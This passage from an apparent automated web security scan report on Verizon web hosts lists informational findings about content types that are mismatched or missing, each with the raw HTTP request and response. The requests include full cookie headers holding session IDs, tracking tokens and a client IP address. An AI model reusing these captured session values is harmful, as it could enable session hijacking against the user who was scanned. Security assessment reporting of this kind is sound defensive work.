TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; 
RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; refURL=https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V

Response

HTTP/1.0 200 OK
Content-Length: 1788
Content-Type: image/gif
Content-Location: http://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/buttons/btn_continueS.gif
Last-Modified: Thu, 01 Sep 2011 17:51:54 GMT
Accept-Ranges: bytes
ETag: "099b7d5cf68cc1:6129"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:25:08 GMT
Connection: keep-alive

.PNG
.
...IHDR...w.........!.q*....PLTE.33.33....""....................................................................ww.............................ww.......ww............................ww...
...[SNIP]...

26.66. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/buttons/btn_ok.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/buttons/btn_ok.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/buttons/btn_ok.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; 
RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; refURL=https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V

Response

HTTP/1.0 200 OK
Content-Length: 1053
Content-Type: image/gif
Content-Location: http://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/buttons/btn_ok.gif
Last-Modified: Thu, 01 Sep 2011 17:51:54 GMT
Accept-Ranges: bytes
ETag: "099b7d5cf68cc1:6129"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:25:09 GMT
Connection: keep-alive

.PNG
.
...IHDR...;.................PLTE......................fg.ww......................DE.......DD.......UU.Z[.......ww.......ac..........ww.....................................................
...[SNIP]...

26.67. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/headers/bk.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/headers/bk.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/headers/bk.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 110
Content-Type: image/gif
Content-Location: http://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/headers/bk.gif
Last-Modified: Thu, 01 Sep 2011 17:51:56 GMT
Accept-Ranges: bytes
ETag: "0c6e8d6cf68cc1:6129"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:25:08 GMT
Connection: keep-alive

.PNG
.
...IHDR..............Fq....    vpAg............
... IDAT..c......E..................*.."]..M....IEND.B`.

26.68. https://www22.verizon.com/ForYourSmallBiz/GoFlow/Common/Images/OrderNew/buttons/gray.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /ForYourSmallBiz/GoFlow/Common/Images/OrderNew/buttons/gray.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /ForYourSmallBiz/GoFlow/Common/Images/OrderNew/buttons/gray.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 114
Content-Type: image/gif
Content-Location: http://www22.verizon.com/ForYourSmallBiz/GoFlow/Common/Images/OrderNew/buttons/gray.gif
Last-Modified: Thu, 01 Sep 2011 17:51:54 GMT
Accept-Ranges: bytes
ETag: "099b7d5cf68cc1:6129"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:25:07 GMT
Connection: keep-alive

.PNG
.
...IHDR.......5............9IDAT....... .....GE....p...jM.,......S.$...Z....F.x........2./N.....IEND.B`.

26.69. https://www22.verizon.com/content/verizonglobalhome/gPromo.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /content/verizonglobalhome/gPromo.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /content/verizonglobalhome/gPromo.aspx?getVal=1 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/?lid=//global//residential
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 21
Expires: Mon, 05 Sep 2011 22:19:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:19:51 GMT
Connection: keep-alive

,Y,FL;NY;PA,Y,807,,

26.70. https://www22.verizon.com/foryoursmallbiz/goflow/common/images/OrderNew/form/checkbox.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /foryoursmallbiz/goflow/common/images/OrderNew/form/checkbox.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /foryoursmallbiz/goflow/common/images/OrderNew/form/checkbox.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 722
Content-Type: image/gif
Content-Location: http://www22.verizon.com/foryoursmallbiz/goflow/common/images/OrderNew/form/checkbox.gif
Last-Modified: Thu, 01 Sep 2011 17:51:56 GMT
Accept-Ranges: bytes
ETag: "0c6e8d6cf68cc1:6129"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:25:11 GMT
Connection: keep-alive

.PNG
.
...IHDR.......d.....D.kN....PLTE.............~.....u..............l.....d.............
...............\..........=\:{.....x..A\=<_;...u.{v.{p.}p.}.V.<d;t.w..................t.yY.f8k:[.fs.w...
...[SNIP]...

26.71. https://www22.verizon.com/includes/cache/getwb31.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /includes/cache/getwb31.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /includes/cache/getwb31.asp?zip=10011 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 683
Content-Type: text/javascript
Expires: Mon, 05 Sep 2011 22:26:47 GMT
Cache-Control: Private
Date: Mon, 05 Sep 2011 22:21:47 GMT
Connection: keep-alive


rewriteHTML('scbwbnotice','');
rewriteHTML('scbwblinktext','New York,&nbsp;NY&nbsp;10011');
rewriteHTML('scbwbicon','<a href=\'http://weather.weatherbug.com/NY/New York-weather.html?zcode=z6726&zi
...[SNIP]...

26.72. https://www22.verizon.com/includes/javascript/commonjs/

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /includes/javascript/commonjs/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /includes/javascript/commonjs/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Type: text/html
Date: Mon, 05 Sep 2011 22:21:41 GMT
Content-Length: 18981
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:41 GMT; path=/includes/; domain=verizon.com


var arrHost=(window.location.hostname).split('.');
var scbCkDom='.'+arrHost[arrHost.length-2]+'.'+arrHost[arrHost.length-1];

/* detect.js */

var agt=navigator.userAgent.toLowerCase();
va
...[SNIP]...

26.73. https://www22.verizon.com/includes/javascript/oo_engine_c.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /includes/javascript/oo_engine_c.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /includes/javascript/oo_engine_c.js HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Type: text/html
Date: Mon, 05 Sep 2011 22:21:46 GMT
Content-Length: 29881
Connection: keep-alive


var OnlineOpinion=new Object();OnlineOpinion.util={SafeAddOnLoadEvent:function(func){if(!document.getElementById|!document.getElementsByTagName)return;var oldonload=window.onload;if(typeof window.
...[SNIP]...

27. Content type is not specified
There are 15 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results and, if the content contains any user-controllable data, may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


27.1. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/config.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/Default/tiles/LoginFlash/config.xml

Request

GET /enterprisesolutions/Default/tiles/LoginFlash/config.xml HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 864
Accept-Ranges: bytes
Last-Modified: Wed, 06 Jul 2011 19:14:34 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Expires: Mon, 05 Sep 2011 22:26:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:26:27 GMT
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<config>
   <languages>
       <language id="en">
           <fonts url="fonts/fonts_en.swf" />
           <content url="content/data_feed_en.xml" />
           <styles url="css/flash_en.css"
...[SNIP]...

27.2. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/content/data_feed_en.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/Default/tiles/LoginFlash/content/data_feed_en.xml

Request

GET /enterprisesolutions/Default/tiles/LoginFlash/content/data_feed_en.xml HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 4601
Accept-Ranges: bytes
Last-Modified: Fri, 08 Jul 2011 14:13:40 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Expires: Mon, 05 Sep 2011 22:26:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:26:43 GMT
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<root width="1000" height="500">

<pages>
   <!--PAGE 1-->
   <page id="terremark2" enabled="true" timing="10">
       <label><![CDATA[Terremark]]></label>
       <content typ
